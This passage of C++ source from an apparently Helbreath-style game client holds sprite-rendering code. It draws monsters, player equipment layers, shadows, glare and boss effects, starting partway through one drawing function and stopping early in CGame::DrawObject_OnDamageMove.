	case 57: // Frog
	case 58: // MG
	case 59: // Ettin
	case 60: // Plant
	case 61: // Rudolph
	case 62: // DireBoar
	case 63: // Frost

	case 65: // Ice-Golem
	case 66: // Wyvern

	case 70: // Dragon..........Ajouts par Snoopy
	case 71: // Centaur
	case 72: // ClawTurtle
	case 73: // FireWyvern
	case 74: // GiantCrayfish
	case 75: // Gi Lizard
	case 76: // Gi Tree
	case 77: // Master Orc
	case 78: // Minaus
	case 79: // Nizie
	case 80: // Tentocle
	case 81: // Abaddon
	case 82: // Sorceress
	case 83: // ATK
	case 84: // MasterElf
	case 85: // DSK
	case 86: // HBT
	case 87: // CT
	case 88: // Barbarian
	case 89: // AGC
	case 90: // Gail
		break;

	default:
		_tmp_cFrame = _tmp_cFrame / 2;
		break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX+dx, sY+dy, _tmp_cFrame);

	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX+dx, sY+dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX+dx, sY+dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if( _tmp_sOwnerType == 65 ) // IceGolem
	{	switch( rand()%3 ) {
		case 0:	m_pEffectSpr[76]->PutTransSprite70(sX+dx, sY+dy, _tmp_cFrame, dwTime); break;
		case 1:	m_pEffectSpr[77]->PutTransSprite70(sX+dx, sY+dy, _tmp_cFrame, dwTime); break;
		case 2:	m_pEffectSpr[78]->PutTransSprite70(sX+dx, sY+dy, _tmp_cFrame, dwTime); break;
		}
	}
	if (bTrans == FALSE)
	{	CheckActiveAura(sX+dx, sY+dy, dwTime, _tmp_sOwnerType);
		if (_cDrawingOrder[_tmp_cDir] == 1)
		{	if (iWeaponIndex != -1)
			{	if(bInv) m_pSprite[iWeaponIndex]->PutTransSprite25(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				else
				{	if (iWeaponColor == 0)
						 m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}
			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
						default:
				if (m_cDetailLevel != 0) {
					if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX+dx, sY+dy, 1, dwTime);

			if (_tmp_sOwnerType == 81) // Abaddon
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}else if (bInv == TRUE)
				 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			else
			{	if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}

			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iUndiesIndex != -1)
			{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iPantsIndex != -1)
			{	if(bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iPantsColor == 0)
						 m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}	}

			if (iArmArmorIndex != -1)
			{	if(bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmColor == 0)
						 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}	}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iBodyArmorIndex != -1)
			{	if(bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmorColor == 0)
						 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}	}

			if (iHelmIndex != -1)
			{	if(bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iShieldIndex != -1)
			{	if(bInv) m_pSprite[iShieldIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iShieldColor == 0)
						 m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				}
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13+dx, sY -34+dy, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}
		}else
		{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX+dx, sY+dy, 1, dwTime);

			if (_tmp_sOwnerType == 81) // Abaddon
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite70(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}else if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			else
			{	if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}

			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iUndiesIndex != -1)
			{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iPantsIndex != -1)
			{	if(bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iPantsColor == 0)
						 m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}	}

			if (iArmArmorIndex != -1)
			{	if(bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmColor == 0)
						 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}	}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iBodyArmorIndex != -1)
			{	if(bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmorColor == 0)
						 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}	}

			if (iHelmIndex != -1)
			{	if(bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iShieldIndex != -1)
			{	if(bInv) m_pSprite[iShieldIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iShieldColor == 0)
						 m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				}
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13+dx, sY -34+dy, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iWeaponIndex != -1)
			{	if(bInv) m_pSprite[iWeaponIndex]->PutTransSprite25(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				else
				{	if (iWeaponColor == 0)
						 m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
		}	}	}

		// Berserk
		if ((_tmp_iStatus & 0x20) != 0)
			m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel(40+(_tmp_cDir - 1), sX+dx+20, sY+dy-20, _tmp_cFrame%4, dwTime);
		DrawWanted(sX + dx, sY + dy, dwTime);
		CheckActiveAura2(sX+dx, sY+dy, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX + dx, sY + dy, _tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX + dx, sY + dy, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX + dx, sY + dy, _tmp_sOwnerType, _tmp_iStatus);
    }    }

	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX+dx;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY+dy;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	_tmp_dx = dx;
	_tmp_dy = dy;
	// Snoopy: Abaddon effects
	if (_tmp_sOwnerType == 81)
	{	int randFrame = _tmp_iEffectFrame %12;
		m_pEffectSpr[154]->PutTransSprite70(sX-50	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[155]->PutTransSprite70(sX-20	, sY-80		, randFrame, dwTime);
		m_pEffectSpr[156]->PutTransSprite70(sX+70	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[157]->PutTransSprite70(sX-30	, sY		, randFrame, dwTime);
		m_pEffectSpr[158]->PutTransSprite70(sX-60	, sY+90		, randFrame, dwTime);
		m_pEffectSpr[159]->PutTransSprite70(sX+65	, sY+85		, randFrame, dwTime);
		switch (_tmp_cDir) {
		case 1:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx		, sY+dy+108 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-50	, sY+dy+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 2:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx		, sY+dy+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-70	, sY+dy+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 3:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx		, sY+dy+105 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-90	, sY+dy+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 4:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx-35	, sY+dy+100 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-80	, sY+dy+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 5:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx		, sY+dy+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-65	, sY+dy-5	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 6:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx+45	, sY+dy+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-31	, sY+dy+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 7:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx+40	, sY+dy+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-30	, sY+dy+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 8:
			m_pEffectSpr[153]->PutTransSprite70(sX+dx+20	, sY+dy+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX+dx-20	, sY+dy+16	, _tmp_iEffectFrame %15, dwTime);
			break;
	}	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}

BOOL CGame::DrawObject_OnDamageMove(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{
 int cFrame, cDir;
 int dx, dy;
 int iBodyIndex, iHairIndex, iUndiesIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iHelmIndex, iR, iG, iB;
 int iWeaponIndex, iShieldIndex, iMantleIndex;
 BOOL bInv = FALSE;
 int iWeaponGlare, iShieldGlare;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if(_tmp_sOwnerType == 67 || _tmp_sOwnerType == 68 || _tmp_sOwnerType == 69 || _tmp_sOwnerType == 81) return FALSE;
	if(_tmp_sOwnerType == 35 ) bInv = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
